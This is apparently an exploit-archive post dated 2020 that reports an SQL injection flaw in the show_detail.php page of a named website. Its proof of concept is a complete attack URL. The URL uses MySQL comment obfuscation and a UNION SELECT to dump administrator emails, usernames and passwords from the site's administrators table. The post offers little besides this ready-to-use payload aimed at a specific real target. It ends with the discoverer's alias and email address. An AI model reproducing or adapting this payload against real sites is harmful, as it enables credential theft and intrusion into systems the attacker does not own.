-------------------------------------------------------------*
#Exploit Title: bapacthousandoaks- SQL Injection vulnerability
#Date: 2020-09-27
#Exploit Author: ERa
#Category:webapps
#Tested On: windows 10, Firefox
Proof of Concept:
Demo :
https://bapacthousandoaks.com/show_detail.php?id=-416%27%20/*!50000union*/%20/*!50000select*/%201,2,3,4,5,6,7,/*!50000group_concat(admin_email,%27%3Cbr%3E%27,admin_user,%27%3Cbr%3E%27,admin_pass)*/,9,10
,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57%20/*!50000from*/%20administrators--+
-------------------------------------------------------------*
#Discovered by: ERa
#Email: era_reborn@yahoo.com
-------------------------------------------------------------*